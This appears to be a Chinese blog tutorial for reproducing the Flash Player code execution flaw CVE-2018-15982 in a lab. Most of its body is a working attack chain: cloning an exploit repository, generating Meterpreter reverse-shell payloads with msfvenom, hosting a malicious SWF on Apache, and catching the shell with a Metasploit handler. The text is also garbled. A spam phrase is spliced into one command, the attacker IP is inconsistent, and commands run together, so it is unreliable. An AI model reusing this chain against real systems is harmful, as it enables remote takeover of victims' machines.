这篇文章给大家介绍如何进行任意代码执行漏洞CVE-2018-15982复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。2018年11月29日,某团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。AdobeFlash Player
AdobeFlash Player Installer
AdobeFlash Player 32.0.0.101AdobeFlash Player Installer 31.0.0.122攻击机:Linux kali (IP:190.168.23.130)靶机:Windows 7 X64 (IP:192.168.23.133)git clone漏洞pocgit clone https://github.com/Ridter/CVE-2018-15982_EXP创建payload程序msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444免费云主机域名 LHOST=192.168.23.130 -f raw > 86.binmsfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 64.bin会生成两个bin文件,分别为86bin和64binpoc执行并开启http生成poccp *.bin CVE-2018-15982_EXP/cd CVE-2018-15982_EXP/python CVE_2018_15982.py -i 86.bin -I 64.bin开启web服务service apache2 startcp index.html /var/www/html/cp exploit.swf /var/www/html/msf监听msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcp_rc4set lport 4444set lhost 192.168.23.130set RC4PASSWORD zalerun通过靶机访问http://192.168.23.130/index.html
可以看到返回shell
关于如何进行任意代码执行漏洞CVE-2018-15982复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
今天小编给大家分享一下linux如何查看安装了哪些软件的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。 linux查看安装了哪些免费云主机域名软件…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。